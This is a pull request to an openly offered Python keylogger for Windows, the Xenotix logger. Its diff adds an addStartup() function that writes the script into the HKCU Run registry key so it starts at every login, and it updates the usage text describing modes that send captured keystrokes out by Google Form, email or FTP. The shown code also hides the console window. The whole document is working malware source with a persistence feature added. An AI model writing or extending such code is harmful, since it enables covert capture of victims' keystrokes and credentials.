### PR TITLE
Run on Windows startup functionality added

### DIFF
--- a/xenotix_python_logger.py
+++ b/xenotix_python_logger.py
@@ -37,6 +37,7 @@ import smtplib
 import ftplib
 import datetime,time
 import win32event, win32api, winerror
+from _winreg import *
 
 #Disallowing Multiple Instance
 mutex = win32event.CreateMutex(None, 1, 'mutex_var_xboz')
@@ -54,19 +55,37 @@ def hide():
     window = win32console.GetConsoleWindow()
     win32gui.ShowWindow(window,0)
     return True
+
 def msg():
-    print """Xenotix Python Keylogger for Windows
+    print """\n \nXenotix Python Keylogger for Windows
 Coder: Ajin Abraham <ajin25@gmail.com>
 OPENSECURITY.IN
 
-usage:xenotix_python_logger.py mode
+usage:xenotix_python_logger.py mode [optional:startup]
+
 mode:
      local: store the logs in a file [keylogs.txt]
+     
      remote: send the logs to a Google Form. You must specify the Form URL and Field Name in the script.
+     
      email: send the logs to an email. You must specify (SERVER,PORT,USERNAME,PASSWORD,TO).
+     
      ftp: upload logs file to an FTP account. You must specify (SERVER,USERNAME,PASSWORD,SSL OPTION,OUTPUT DIRECTORY).
-     """
+
+[optional] startup: This will add the keylogger to windows startup.\n\n"""
     return True
+
+# Add to startup
+def addStartup():
+    fp=os.path.dirname(os.path.realpath(__file__))
+    file_name=sys.argv[0].split("\\")[-1]
+    new_file_path=fp+"\\"+file_name
+    keyVal= r'Software\Microsoft\Windows\CurrentVersion\Run'
+
+    key2change= OpenKey(HKEY_CURRENT_USER,
+    keyVal,0,KEY_ALL_ACCESS)
+
+    SetValueEx(key2change, "Xenotix Keylogger",0,REG_SZ, new_file_path)
 
 #Local Keylogger
 def local():
@@ -167,6 +186,12 @@ def main():
         msg()
         exit(0)
     else:
+        if len(sys.argv)>2:
+            if sys.argv[2]=="startup":
+                addStartup() 
+            else:
+                msg()
+                exit(0)
         if sys.argv[1]=="local":
             x=1
             hide()
@@ -184,7 +209,9 @@ def main():
             msg()
             exit(0)
     return True
-main()
+
+if __name__ == '__main__':
+    main()
 
 def keypressed(event):
     global x,data


### PR DESCRIPTION
This will allow the Key-logger to run at windows startup. Usage description is also edited to allow better understanding and comfort.